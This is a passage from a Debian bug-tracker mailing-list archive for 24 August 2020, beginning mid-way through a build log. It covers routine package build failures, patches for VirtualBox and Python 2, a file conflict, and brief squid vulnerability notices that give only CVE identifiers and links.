>  [echo] build.native=/<>/build/native-linux-x86-64
>  [echo] build.headers=/<>/build/headers
>  [echo] build.aar=/<>/build/aar
> 
> -setup:
> 
> -enable-native:
> 
> compile:
> [javac] Compiling 63 source files to /<>/build/classes
> [javac] warning: [options] bootstrap class path not set in conjunction 
> with -source 8
> [javac] /<>/src/com/sun/jna/Memory.java:181: warning: 
> [deprecation] finalize() in Object has been deprecated
> [javac] protected void finalize() {
> [javac]^
> [javac] /<>/src/com/sun/jna/CallbackReference.java:379: 
> warning: [deprecation] finalize() in Object has been deprecated
> [javac] protected void finalize() {
> [javac]^
> [javac] /<>/src/com/sun/jna/CallbackReference.java:485: 
> warning: [deprecation] isAccessible() in AccessibleObject has been deprecated
> [javac] if (!callbackMethod.isAccessible()) {
> [javac]^
> [javac] /<>/src/com/sun/jna/Native.java:238: warning: 
> [deprecation] finalize() in Object has been deprecated
> [javac] protected void finalize() throws Throwable {
> [javac]^
> [javac] /<>/src/com/sun/jna/Native.java:240: warning: 
> [deprecation] finalize() in Object has been deprecated
> [javac] super.finalize();
> [javac]  ^
> [javac] /<>/src/com/sun/jna/NativeLibrary.java:649: warning: 
> [deprecation] finalize() in Object has been deprecated
> [javac] protected void finalize() {
> [javac]^
> [javac] Note: Some input files use unchecked or unsafe operations.
> [javac] Note: Recompile with -Xlint:unchecked for details.
> [javac] 7 warnings
> 
> javah:
> [propertyfile] Creating new property file: 
> /<>/build/headers/jni.properties
> 
> -native-api-check:
> 
> :rsrc:
> 
> rsrc:
> 
> -prepare-native:
> 
> native:
>  [exec] make[2]: 

Processed: Re: Bug#968940: linux: please add patch to support virtualbox on kernel 5.8

2020-08-24 Thread Debian Bug Tracking System
Processing control commands:

> severity -1 important
Bug #968940 [src:linux] linux: please add patch to support virtualbox on kernel 
5.8
Severity set to 'important' from 'serious'

-- 
968940: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968940
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems



Bug#968940: linux: please add patch to support virtualbox on kernel 5.8

2020-08-24 Thread Bastian Blank
Control: severity -1 important

On Mon, Aug 24, 2020 at 12:11:08PM +0200, Gianfranco Costamagna wrote:
> Hello, as explained on upstream ticket [1], the new kernel broke virtualbox, 
> and the only fix that has been found
> so far is to export map_kernel_range and __get_vm_area_caller to modules

Please talk to linux upstream.

Bastian

-- 
"Get back to your stations!"
"We're beaming down to the planet, sir."
-- Kirk and Mr. Leslie, "This Side of Paradise",
   stardate 3417.3



Processed: tagging 957572

2020-08-24 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

> tags 957572 + ftbfs
Bug #957572 [src:munipack] munipack: ftbfs with GCC-10
Added tag(s) ftbfs.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
957572: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=957572
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems



Bug#968940: linux: please add patch to support virtualbox on kernel 5.8

2020-08-24 Thread Gianfranco Costamagna
Source: linux
Version: 5.8.3-1~exp1
Severity: serious
tags: patch

Hello, as explained on upstream ticket [1], the new kernel broke virtualbox, 
and the only fix that has been found
so far is to export map_kernel_range and __get_vm_area_caller to modules

https://www.virtualbox.org/attachment/ticket/19644/local_patches

This trivial patch does the trick
diff --git a/mm/vmalloc.c b/mm/vmalloc.c
--- a/mm/vmalloc.c
+++ b/mm/vmalloc.c
@@ -325,6 +325,7 @@ int map_kernel_range(unsigned long start, unsigned long 
size, pgprot_t prot,
flush_cache_vmap(start, start + size);
return ret;
 }
+EXPORT_SYMBOL(map_kernel_range);
 
 int is_vmalloc_or_module_addr(const void *x)
 {
@@ -2130,6 +2131,7 @@ struct vm_struct *__get_vm_area_caller(unsigned long 
size, unsigned long flags,
return __get_vm_area_node(size, 1, flags, start, end, NUMA_NO_NODE,
  GFP_KERNEL, caller);
 }
+EXPORT_SYMBOL(__get_vm_area_caller);
 
 /**
  * get_vm_area - reserve a contiguous kernel virtual area


[1] https://www.virtualbox.org/ticket/19644

thanks

Gianfranco



Bug#968739: [benjamin.redeli...@gmail.com: Bug#968739: igv will not run]

2020-08-24 Thread Pierre Gruet
Hi,

Le 21/08/2020 à 12:44, Andreas Tille a écrit :
> Hi Pierre,
> 
> On Fri, Aug 21, 2020 at 11:32:47AM +0200, Pierre Gruet wrote:
>>> I injected the latest upstream version into Git.  It does not include so
>>> many binary jar's any more but I think its trying to download these
>>> instead.  I gave up for the moment since I have no idea about gradle.
>>>
>> Thanks! Many of those jars are in Debian packages, so there is hope to
>> get rid of many, maybe all... I'm looking at it.
>>

Contrarily to what I wrote a few days ago, I do not think we are ready
to remove all included jars in igv.
For instance we would have to package libgoby-java, I have just made
some packaging effort on its new upstream version [0] after Andreas
began but, as Olivier noticed before on a previous upstream version [1],
there are still many jars missing in Debian.

We would also need to have the huge Amazon AWS SDK packaged...

I will thus work on #968739 and on the new upstream version but I am
afraid we will have to keep igv in non-free for the moment :-(

> 
> Thanks a lot.  That would be another mile stone!
> 
> Kind regards
> 
>   Andreas.
> 

All the best,
Pierre

[0] https://salsa.debian.org/med-team/libgoby-java/
[1] https://lists.debian.org/debian-med/2013/02/msg00152.html



Bug#964667: marked as pending in node-chokidar

2020-08-24 Thread Xavier Guimard
Control: tag -1 pending

Hello,

Bug #964667 in node-chokidar reported by you has been fixed in the
Git repository and is awaiting an upload. You can see the commit
message below and you can check the diff of the fix at:

https://salsa.debian.org/js-team/node-chokidar/-/commit/da3bed8f200ce9042d1dcc7b83010638970803ec


Set test timeout to the value given by upstream

Closes: #964667


(this message was generated automatically)
-- 
Greetings

https://bugs.debian.org/964667



Processed: Bug#964667 marked as pending in node-chokidar

2020-08-24 Thread Debian Bug Tracking System
Processing control commands:

> tag -1 pending
Bug #964667 [src:node-chokidar] node-chokidar: FTBFS: dh_auto_test: error: 
/bin/sh -ex debian/tests/pkg-js/test returned exit code 1
Added tag(s) pending.

-- 
964667: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=964667
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems



Bug#968883: mame FTBFS on !x86

2020-08-24 Thread Jordi Mallach
Hi Adrian,

El dg. 23 de 08 de 2020 a les 08:45 +0300, en/na Adrian Bunk va
escriure:
> Source: mame
> Version: 0.223+dfsg.1-1
> Severity: serious
> Tags: ftbfs
> 
> https://buildd.debian.org/status/logs.php?pkg=mame=0.223%2Bdfsg.1-1=sid
> 
> Errors look quite different on different architectures.

I'm aware, yes. I need to dig into this because it's most probably
related to build options applied to each arch that has changed
upstream. In any case, a new release is two days away, so I'll wait for
that first.

Thanks for the bug report,
Jordi



Bug#958005: marked as done (xtrkcad: ftbfs with GCC-10)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 08:48:38 +
with message-id 
and subject line Bug#958005: fixed in xtrkcad 1:5.2.0Beta2.1-1
has caused the Debian Bug report #958005,
regarding xtrkcad: ftbfs with GCC-10
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
958005: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=958005
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: src:xtrkcad
Version: 1:5.1.1-2
Severity: normal
Tags: sid bullseye
User: debian-...@lists.debian.org
Usertags: ftbfs-gcc-10

Please keep this issue open in the bug tracker for the package it
was filed for.  If a fix in another package is required, please
file a bug for the other package (or clone), and add a block in this
package. Please keep the issue open until the package can be built in
a follow-up test rebuild.

The package fails to build in a test rebuild on at least amd64 with
gcc-10/g++-10, but succeeds to build with gcc-9/g++-9. The
severity of this report will be raised before the bullseye release,
so nothing has to be done for the buster release.

The full build log can be found at:
http://people.debian.org/~doko/logs/gcc10-20200225/xtrkcad_5.1.1-2_unstable_gcc10.log
The last lines of the build log are at the end of this report.

To build with GCC 10, either set CC=gcc-10 CXX=g++-10 explicitly,
or install the gcc, g++, gfortran, ... packages from experimental.

  apt-get -t=experimental install g++ 

Common build failures are new warnings resulting in build failures with
-Werror turned on, or new/dropped symbols in Debian symbols files.
For other C/C++ related build failures see the porting guide at
http://gcc.gnu.org/gcc-10/porting_to.html

[...]
   36 |   return __builtin___sprintf_chk (__s, __USE_FORTIFY_LEVEL - 1,
  |  ^~
   37 |   __bos (__s), __fmt, __va_arg_pack ());
  |   ~
[ 88%] Building C object app/bin/CMakeFiles/xtrkcad-lib.dir/lprintf.c.o
cd /<>/obj-x86_64-linux-gnu/app/bin && /usr/bin/cc 
-DXTRKCAD_CMAKE_BUILD -I/<>/app/bin 
-I/<>/app/dynstring -I/<>/app/cornu 
-I/<>/obj-x86_64-linux-gnu/app/bin 
-I/<>/obj-x86_64-linux-gnu 
-I/<>/obj-x86_64-linux-gnu/app/help 
-I/<>/app/wlib/include  -g -O2 
-fdebug-prefix-map=/<>=. -fstack-protector-strong -Wformat 
-Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2   -std=gnu99 -o 
CMakeFiles/xtrkcad-lib.dir/lprintf.c.o   -c /<>/app/bin/lprintf.c
[ 88%] Building C object app/bin/CMakeFiles/xtrkcad-lib.dir/macro.c.o
cd /<>/obj-x86_64-linux-gnu/app/bin && /usr/bin/cc 
-DXTRKCAD_CMAKE_BUILD -I/<>/app/bin 
-I/<>/app/dynstring -I/<>/app/cornu 
-I/<>/obj-x86_64-linux-gnu/app/bin 
-I/<>/obj-x86_64-linux-gnu 
-I/<>/obj-x86_64-linux-gnu/app/help 
-I/<>/app/wlib/include  -g -O2 
-fdebug-prefix-map=/<>=. -fstack-protector-strong -Wformat 
-Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2   -std=gnu99 -o 
CMakeFiles/xtrkcad-lib.dir/macro.c.o   -c /<>/app/bin/macro.c
[ 89%] Building C object app/bin/CMakeFiles/xtrkcad-lib.dir/misc2.c.o
[ 89%] Building C object app/bin/CMakeFiles/xtrkcad-lib.dir/param.c.o
cd /<>/obj-x86_64-linux-gnu/app/bin && /usr/bin/cc 
-DXTRKCAD_CMAKE_BUILD -I/<>/app/bin 
-I/<>/app/dynstring -I/<>/app/cornu 
-I/<>/obj-x86_64-linux-gnu/app/bin 
-I/<>/obj-x86_64-linux-gnu 
-I/<>/obj-x86_64-linux-gnu/app/help 
-I/<>/app/wlib/include  -g -O2 
-fdebug-prefix-map=/<>=. -fstack-protector-strong -Wformat 
-Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2   -std=gnu99 -o 
CMakeFiles/xtrkcad-lib.dir/misc2.c.o   -c /<>/app/bin/misc2.c
cd /<>/obj-x86_64-linux-gnu/app/bin && /usr/bin/cc 
-DXTRKCAD_CMAKE_BUILD -I/<>/app/bin 
-I/<>/app/dynstring -I/<>/app/cornu 
-I/<>/obj-x86_64-linux-gnu/app/bin 
-I/<>/obj-x86_64-linux-gnu 
-I/<>/obj-x86_64-linux-gnu/app/help 
-I/<>/app/wlib/include  -g -O2 
-fdebug-prefix-map=/<>=. -fstack-protector-strong -Wformat 
-Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2   -std=gnu99 -o 
CMakeFiles/xtrkcad-lib.dir/param.c.o   -c /<>/app/bin/param.c
[ 90%] Building C object app/bin/CMakeFiles/xtrkcad-lib.dir/paths.c.o
cd /<>/obj-x86_64-linux-gnu/app/bin && /usr/bin/cc 
-DXTRKCAD_CMAKE_BUILD -I/<>/app/bin 
-I/<>/app/dynstring -I/<>/app/cornu 
-I/<>/obj-x86_64-linux-gnu/app/bin 
-I/<>/obj-x86_64-linux-gnu 
-I/<>/obj-x86_64-linux-gnu/app/help 
-I/<>/app/wlib/include  -g -O2 
-fdebug-prefix-map=/<>=. -fstack-protector-strong -Wformat 
-Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2   -std=gnu99 -o 
CMakeFiles/xtrkcad-lib.dir/paths.c.o   -c /<>/app/bin/paths.c
/<>/app/bin/param.c: In function 

Bug#957720: pyparted: ftbfs with GCC-10

2020-08-24 Thread Michael Prokop
* Matthias Klose [Fri Apr 17, 2020 at 11:09:24AM +]:
> Package: src:pyparted
> Version: 3.11.2-11.1
> Severity: normal
> Tags: sid bullseye
> User: debian-...@lists.debian.org
> Usertags: ftbfs-gcc-10

> Please keep this issue open in the bug tracker for the package it
> was filed for.  If a fix in another package is required, please
> file a bug for the other package (or clone), and add a block in this
> package. Please keep the issue open until the package can be built in
> a follow-up test rebuild.

> The package fails to build in a test rebuild on at least amd64 with
> gcc-10/g++-10, but succeeds to build with gcc-9/g++-9. The
> severity of this report will be raised before the bullseye release,
> so nothing has to be done for the buster release.
[...]

Current upstream version of pyparted is v3.11.6 (according to
https://github.com/dcantrell/pyparted/releases) and version 3.11.5
included fixes for gcc 10, so it looks like it might be worth
uploading a new version of pyparted to address this release critical
issue?

regards
-mika-


signature.asc
Description: Digital signature


Bug#967118: 0ad: Unversioned Python removal in sid/bullseye

2020-08-24 Thread Fabio Pedretti
I think this issue is still not properly closed.
The package removal reported in the first mail includes
python-minimal, which has the /usr/bin/python executable.
This is still used by libraries/source/cxxtest-4.4/bin/cxxtestgen file.
Indeed Ubuntu also has this patch.

diff -pruN 0.0.23.1-4/debian/patches/python2.patch
0.0.23.1-4ubuntu5/debian/patches/python2.patch
--- 0.0.23.1-4/debian/patches/python2.patch1970-01-01
00:00:00.0 +
+++ 0.0.23.1-4ubuntu5/debian/patches/python2.patch2020-02-06
12:02:59.0 +
@@ -0,0 +1,12 @@
+Description: Update cxxtestgen shebang.
+Author: Dimitri John Ledkov 
+
+
+--- 0ad-0.0.23.1.orig/libraries/source/cxxtest-4.4/bin/cxxtestgen
 0ad-0.0.23.1/libraries/source/cxxtest-4.4/bin/cxxtestgen
+@@ -1,4 +1,4 @@
+-#! /usr/bin/env python
++#! /usr/bin/env python2
+ #
+ # The CxxTest driver script, which uses the cxxtest Python package.
+ #



Processed: Re: python3-commonmark: file conflict with cmark, php-league-commonmark

2020-08-24 Thread Debian Bug Tracking System
Processing control commands:

> found -1 0.9.1-2
Bug #968689 {Done: Sandro Tosi } [python3-commonmark] 
python3-commonmark: file conflict with cmark
Marked as found in versions commonmark/0.9.1-2; no longer marked as fixed in 
versions commonmark/0.9.1-2 and reopened.
> retitle -1 python3-commonmark: file conflict with cmark, php-league-commonmark
Bug #968689 [python3-commonmark] python3-commonmark: file conflict with cmark
Changed Bug title to 'python3-commonmark: file conflict with cmark, 
php-league-commonmark' from 'python3-commonmark: file conflict with cmark'.

-- 
968689: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968689
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems



Bug#968689: python3-commonmark: file conflict with cmark, php-league-commonmark

2020-08-24 Thread Andreas Beckmann
Followup-For: Bug #968689
Control: found -1 0.9.1-2
Control: retitle -1 python3-commonmark: file conflict with cmark, 
php-league-commonmark

Hi,

you just traded the file conflict with cmark on /usr/bin/cmark with a
new conflict with php-league-commonmark on /usr/bin/commonmark

  Preparing to unpack .../python3-commonmark_0.9.1-2_all.deb ...
  Unpacking python3-commonmark (0.9.1-2) ...
  dpkg: error processing archive 
/var/cache/apt/archives/python3-commonmark_0.9.1-2_all.deb (--unpack):
   trying to overwrite '/usr/bin/commonmark', which is also in package 
php-league-commonmark 1.5.3-1
  Errors were encountered while processing:
   /var/cache/apt/archives/python3-commonmark_0.9.1-2_all.deb

Andreas

PS: there is a 'm' missing in the binary name in the -2 changelog entry



Bug#968932: squid: CVE-2020-15811: SQUID-2020:8 HTTP(S) Request Splitting

2020-08-24 Thread Salvatore Bonaccorso
Source: squid
Version: 4.12-1
Severity: grave
Tags: security upstream
X-Debbugs-Cc: car...@debian.org, Debian Security Team 

Hi,

The following vulnerability was published for squid.

CVE-2020-15811[0]:
| SQUID-2020:8 HTTP(S) Request Splitting

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2020-15811
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15811
[1] https://github.com/squid-cache/squid/security/advisories/GHSA-c7p8-xqhm-49wv
[2] http://www.squid-cache.org/Versions/v4/changesets/SQUID-2020_8.patch

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore



Bug#968933: squid: SQUID-2020:9 Denial of Service processing Cache Digest Response

2020-08-24 Thread Salvatore Bonaccorso
Source: squid
Version: 4.12-1
Severity: grave
Tags: security upstream
Justification: user security hole
X-Debbugs-Cc: car...@debian.org, Debian Security Team 

Hi,

The following vulnerability was published for squid, but there is no
CVE assigned yet:

| SQUID-2020:9 Denial of Service processing Cache Digest Response 

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
(once it is assigned if that happends before the upload).

For further information see:

[0] https://github.com/squid-cache/squid/security/advisories/GHSA-vvj7-xjgq-g2jg
[1] http://www.squid-cache.org/Versions/v4/changesets/SQUID-2020_9.patch

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore



Bug#968934: squid: CVE-2020-15810: SQUID-2020:10 HTTP(S) Request Smuggling

2020-08-24 Thread Salvatore Bonaccorso
Source: squid
Version: 4.12-1
Severity: grave
Tags: security upstream
Justification: user security hole
X-Debbugs-Cc: car...@debian.org, Debian Security Team 

Hi,

The following vulnerability was published for squid.

CVE-2020-15810[0]:
| SQUID-2020:10 HTTP(S) Request Smuggling

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2020-15810
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15810
[1] https://github.com/squid-cache/squid/security/advisories/GHSA-3365-q9qx-f98m
[2] http://www.squid-cache.org/Versions/v4/changesets/SQUID-2020_10.patch

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore



Bug#957496: marked as done (llvm-toolchain-8: ftbfs with GCC-10)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 07:19:02 +
with message-id 
and subject line Bug#957496: fixed in llvm-toolchain-8 1:8.0.1-10
has caused the Debian Bug report #957496,
regarding llvm-toolchain-8: ftbfs with GCC-10
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
957496: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=957496
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: src:llvm-toolchain-8
Version: 1:8.0.1-7
Severity: normal
Tags: sid bullseye
User: debian-...@lists.debian.org
Usertags: ftbfs-gcc-10

Please keep this issue open in the bug tracker for the package it
was filed for.  If a fix in another package is required, please
file a bug for the other package (or clone), and add a block in this
package. Please keep the issue open until the package can be built in
a follow-up test rebuild.

The package fails to build in a test rebuild on at least amd64 with
gcc-10/g++-10, but succeeds to build with gcc-9/g++-9. The
severity of this report will be raised before the bullseye release,
so nothing has to be done for the buster release.

The full build log can be found at:
http://people.debian.org/~doko/logs/gcc10-20200225/llvm-toolchain-8_8.0.1-7_unstable_gcc10.log
The last lines of the build log are at the end of this report.

To build with GCC 10, either set CC=gcc-10 CXX=g++-10 explicitly,
or install the gcc, g++, gfortran, ... packages from experimental.

  apt-get -t=experimental install g++ 

Common build failures are new warnings resulting in build failures with
-Werror turned on, or new/dropped symbols in Debian symbols files.
For other C/C++ related build failures see the porting guide at
http://gcc.gnu.org/gcc-10/porting_to.html

[...]
[  2%] Building CXX object 
lib/Support/CMakeFiles/LLVMSupport.dir/raw_os_ostream.cpp.o
cd /<>/build-llvm/tools/clang/stage2-bins/lib/Support && 
/<>/build-llvm/./bin/clang++  -D_GNU_SOURCE 
-D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS -D__STDC_LIMIT_MACROS 
-I/<>/build-llvm/tools/clang/stage2-bins/lib/Support 
-I/<>/lib/Support 
-I/<>/build-llvm/tools/clang/stage2-bins/include 
-I/<>/include  -fuse-ld=gold -fPIC 
-Wno-unused-command-line-argument -Wno-unknown-warning-option -fPIC 
-fvisibility-inlines-hidden -Werror=date-time 
-Werror=unguarded-availability-new -std=c++11 -Wall -Wextra 
-Wno-unused-parameter -Wwrite-strings -Wcast-qual -Wmissing-field-initializers 
-pedantic -Wno-long-long -Wimplicit-fallthrough -Wcovered-switch-default 
-Wno-class-memaccess -Wno-noexcept-type -Wnon-virtual-dtor 
-Wdelete-non-virtual-dtor -Wstring-conversion -ffunction-sections 
-fdata-sections -O2 -DNDEBUG -g1-fno-exceptions -o 
CMakeFiles/LLVMSupport.dir/raw_os_ostream.cpp.o -c 
/<>/lib/Support/raw_os_o
 stream.cpp
[  2%] Building CXX object 
lib/Support/CMakeFiles/LLVMSupport.dir/raw_ostream.cpp.o
cd /<>/build-llvm/tools/clang/stage2-bins/lib/Support && 
/<>/build-llvm/./bin/clang++  -D_GNU_SOURCE 
-D__STDC_CONSTANT_MACROS -D__STDC_FORMAT_MACROS -D__STDC_LIMIT_MACROS 
-I/<>/build-llvm/tools/clang/stage2-bins/lib/Support 
-I/<>/lib/Support 
-I/<>/build-llvm/tools/clang/stage2-bins/include 
-I/<>/include  -fuse-ld=gold -fPIC 
-Wno-unused-command-line-argument -Wno-unknown-warning-option -fPIC 
-fvisibility-inlines-hidden -Werror=date-time 
-Werror=unguarded-availability-new -std=c++11 -Wall -Wextra 
-Wno-unused-parameter -Wwrite-strings -Wcast-qual -Wmissing-field-initializers 
-pedantic -Wno-long-long -Wimplicit-fallthrough -Wcovered-switch-default 
-Wno-class-memaccess -Wno-noexcept-type -Wnon-virtual-dtor 
-Wdelete-non-virtual-dtor -Wstring-conversion -ffunction-sections 
-fdata-sections -O2 -DNDEBUG -g1-fno-exceptions -o 
CMakeFiles/LLVMSupport.dir/raw_ostream.cpp.o -c 
/<>/lib/Support/raw_ostream
 .cpp
[  2%] Building C object lib/Support/CMakeFiles/LLVMSupport.dir/regcomp.c.o
cd /<>/build-llvm/tools/clang/stage2-bins/lib/Support && 
/<>/build-llvm/./bin/clang -D_GNU_SOURCE -D__STDC_CONSTANT_MACROS 
-D__STDC_FORMAT_MACROS -D__STDC_LIMIT_MACROS 
-I/<>/build-llvm/tools/clang/stage2-bins/lib/Support 
-I/<>/lib/Support 
-I/<>/build-llvm/tools/clang/stage2-bins/include 
-I/<>/include  -fuse-ld=gold -fPIC 
-Wno-unused-command-line-argument -Wno-unknown-warning-option -fPIC 
-Werror=date-time -Werror=unguarded-availability-new -Wall -Wextra 
-Wno-unused-parameter -Wwrite-strings -Wmissing-field-initializers -pedantic 
-Wno-long-long -Wimplicit-fallthrough -Wcovered-switch-default 
-Wdelete-non-virtual-dtor -Wstring-conversion -ffunction-sections 
-fdata-sections -O2 -g -DNDEBUG   -o CMakeFiles/LLVMSupport.dir/regcomp.c.o   
-c 

Bug#968280: marked as done (ruby-kramdown-parser-gfm: ftbfs with 2 test failures)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 07:03:53 +
with message-id 
and subject line Bug#968280: fixed in ruby-kramdown-parser-gfm 1.1.0-1
has caused the Debian Bug report #968280,
regarding ruby-kramdown-parser-gfm: ftbfs with 2 test failures
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
968280: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968280
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---

Package: ruby-kramdown-parser-gfm
Version: 1.1.0-1~exp1
Severity: serious
Control: affects -1 ruby-cucumber-core

On a clean sid chroot with ruby-karmdown 2.3.0-3 added, it fails with 
this error message. So reuploading this package to unstable is blocked 
and it results in ruby-cucumber-core ftbfs unfixed.


Finished in 0.066453s, 195.6271 runs/s, 195.6271 assertions/s.

 1) Failure:
TestFiles#test_gfm_backticks_syntax_to_html 
[/<>/test/test_files.rb:32]:

--- expected
+++ actual
@@ -7,9 +7,9 @@
Unbalanced bottom heavy


-class=\"highlight\">class=\"n\">language no class=\"n\">space

-
+language no space
+

-class=\"highlight\">class=\"n\">language with class=\"n\">space

-
+language with space
+
"


 2) Failure:
TestFiles#test_gfm_codeblock_fenced_to_html 
[/<>/test/test_files.rb:32]:

--- expected
+++ actual
@@ -1,9 +1,9 @@
"normal

-class=\"highlight\">class=\"nb\">require 'kramdown'

+require 'kramdown'

-Kramdown::class=\"no\">Document.class=\"nf\">new(class=\"n\">text).class=\"nf\">to_html

-
+Kramdown::Document.new(text).to_html
+

indent with tab

@@ -16,6 +16,6 @@

indent with 2 spaces

-class=\"highlight\">  class=\"nx\">console.class=\"nx\">log(class=\"dl\">\"helloclass=\"dl\">\");

-
+  console.log(\"hello\");
+
"


13 runs, 13 assertions, 2 failures, 0 errors, 0 skips
--- End Message ---
--- Begin Message ---
Source: ruby-kramdown-parser-gfm
Source-Version: 1.1.0-1
Done: =?utf-8?q?C=C3=A9dric_Boutillier?= 

We believe that the bug you reported is fixed in the latest version of
ruby-kramdown-parser-gfm, which is due to be installed in the Debian FTP 
archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 968...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Cédric Boutillier  (supplier of updated 
ruby-kramdown-parser-gfm package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Mon, 24 Aug 2020 00:37:18 +0200
Source: ruby-kramdown-parser-gfm
Architecture: source
Version: 1.1.0-1
Distribution: unstable
Urgency: medium
Maintainer: Debian Ruby Team 

Changed-By: Cédric Boutillier 
Closes: 968280
Changes:
 ruby-kramdown-parser-gfm (1.1.0-1) unstable; urgency=medium
 .
   * Upload to unstable
   * Suggest and build-depend on ruby-rouge, needed for two tests (Closes:
 #968280)
   * Remove trailing spaces in changelog
Checksums-Sha1:
 e864517f338d72ca971d80dd2b663cbdcbeac18f 1852 
ruby-kramdown-parser-gfm_1.1.0-1.dsc
 2a96deb3c5bf4440ba5d123f4e3203f097b34f95 8605 
ruby-kramdown-parser-gfm_1.1.0.orig.tar.gz
 520335fb5322bddeb0dea46ff0d51104f760ecda 2868 
ruby-kramdown-parser-gfm_1.1.0-1.debian.tar.xz
 064726b9e5c0e951f786bd63b64c14a0e637599f 8523 
ruby-kramdown-parser-gfm_1.1.0-1_amd64.buildinfo
Checksums-Sha256:
 17e0732cf98b57a5d09c4cddcb2e5bff1127a89cd50a91c568f48590435bc649 1852 
ruby-kramdown-parser-gfm_1.1.0-1.dsc
 3f61c7f94610602a80d0138868056c91f10832177dcf5d448ea27fc92ff694ff 8605 
ruby-kramdown-parser-gfm_1.1.0.orig.tar.gz
 e74cafaf17e3d900dc793495a9c1391b33495a9482dbeab8cf9f838b7084416a 2868 
ruby-kramdown-parser-gfm_1.1.0-1.debian.tar.xz
 f262aa05d538d1335ba4c4267073964878d849a04b03d877ff665cac423cc35e 8523 
ruby-kramdown-parser-gfm_1.1.0-1_amd64.buildinfo
Files:
 63fd71705c405ee7cd55b1ce9ad43a5a 1852 ruby optional 
ruby-kramdown-parser-gfm_1.1.0-1.dsc
 623acefc04cab61b98145351f143267a 8605 ruby optional 
ruby-kramdown-parser-gfm_1.1.0.orig.tar.gz
 c226d01656fcb709e42407cc88303412 2868 ruby optional 
ruby-kramdown-parser-gfm_1.1.0-1.debian.tar.xz
 97d0391db988921f79453ba6d8402a7f 8523 ruby optional 
ruby-kramdown-parser-gfm_1.1.0-1_amd64.buildinfo

-BEGIN PGP SIGNATURE-

iQEzBAEBCgAdFiEEnM1rMZ2/jkCrGr0aia+CtznNIXoFAl9DYOYACgkQia+CtznN
IXqNEgf/QqcdHnFvjmr+pgghfNu4AH5VS6+422yddLocF0OIJ6HVxbEBjwpBUV3Q

Bug#933111: libcgi-application-perl: build-depends on pkg-components that won't be in Bullseye unless it finds a new upstream maintainer

2020-08-24 Thread intrigeri
Richard Hansen (2020-08-23):

> On 2020-08-23 05:59, intrigeri wrote:
>>  - libtitanium-perl: webapp framework, overlay on top of
>>CGI::Application, last upstream release in 2009, tiny popcon, but
>>I see Richard Hansen added themselves to Uploaders a few days ago,
>>so perhaps you're particularly interested in Titanium, and thus
>>transitively in having a working CGI::Application underlying stack?
>
> I only touched libtitanium-perl because it is an rdep of
> libcgi-application-plugin-viewcode-perl, which I split into two
> packages to get rid of its dependency on pkg-components
> (bug#933116). I worked on bug#933116 as part of yesterday's
> low-hanging fruit session, not because I have any interest in
> CGI::Application stuff.

OK, thank you for making this clear :)